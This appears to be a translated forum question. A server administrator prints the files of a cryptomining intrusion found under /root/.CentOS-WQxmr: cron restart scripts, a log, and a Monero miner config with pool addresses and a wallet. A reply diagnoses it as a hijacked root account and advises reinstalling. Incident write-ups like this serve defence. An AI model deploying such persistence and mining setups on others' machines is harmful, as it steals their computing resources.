Home>

WQxmr process was consuming up resources when I was investigating the cause of the server going down.

When I examined it, there was an unknown directory in /root/.CentOS-WQxmr, where commands etc. were placed.

/root/.CentOS-WQxmr /
/root/.CentOS-WQxmr/pro/
/root/.CentOS-WQxmr/pro/re.sh
#!/bin/bash
# Forgetfulness: 250051917
# What's the forgetfulness Nana, Rina Naga.
  count = `ps -ef | grep CWQxmr | grep -v" grep "| wc -l`
  echo $count
 if [0 == $count];then
   cd ~/.CentOS-WQxmr/pro /
   bash ./CWQxmr&
 fi

/root/.CentOS-WQxmr/pro/CWQxmr
This was an executable file that was running in the background.
Copy and paste was not possible because it was compiled.


/root/.CentOS-WQxmr/pro/self.sh
#!/bin/bash
# Forgetfulness: 250051917
# What's the forgetfulness Nana, Rina Naga.
cd ~/.CentOS-WQxmr/pro /
bash ./CWQxmr&


/root/.CentOS-WQxmr/pro/ok.log
Sunday, August 12, 2018 11:04:46 JST
C
Sunday, August 12, 2018 11:04:46 JST
Successful addition of C-K
Sunday, August 12, 2018 11:04:46 JST
Completed with the armor
Sunday, August 12, 2018 11:05:03 JST
C
Sunday, August 12, 2018 11:05:03 JST
Successful addition of C-K
Sunday, August 12, 2018 11:05:03 JST
Completed with the armor
Monday, August 20, 2018 18:33:02 JST
C
Monday, August 20, 2018 18:33:02 JST
Successful addition of C-K
Monday, August 20, 2018 18:33:02 JST
Completed with the armor


/root/.CentOS-WQxmr/pro/config.json
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": 4,
    "donate-level": 1,
    "log-file": null,
    "max-cpu-usage": 75,
    "pools": [
        {
            "url": "xmr.f2pool.com:13531",
            "user": "4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGip9afNf2WH33wRTJ",
            "pass": "x",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        },
        {
            "url": "pool.supportxmr.com:5555",
            "user": "4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGip9afNf2WH33wRTJ",
            "pass": "x: [email protected]",
            "keepalive": true,
            "nicehash": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 10,
    "safe": false,
    "syslog": false,
    "threads": null
}

The process was killed and the directory was deleted, so it doesn't seem to work now.
The execution of "/root/.CentOS-WQxmr/pro/re.sh" was set to cron every minute, but it was deleted.

I'm curious what this executable file did, but would you like to have a similar experience?
Please let me know if you understand.

Executable files are uniform.

  • Answer # 1

    It looks like a mining device.
    Server root is hacked and charged,
    Someone may have mined the virtual currency.

    That's all,
    Since there may be adverse effects that have not yet manifested,
    Is it better to initialize the server and reset the security?
    You can't say that it's okay because you changed your root password.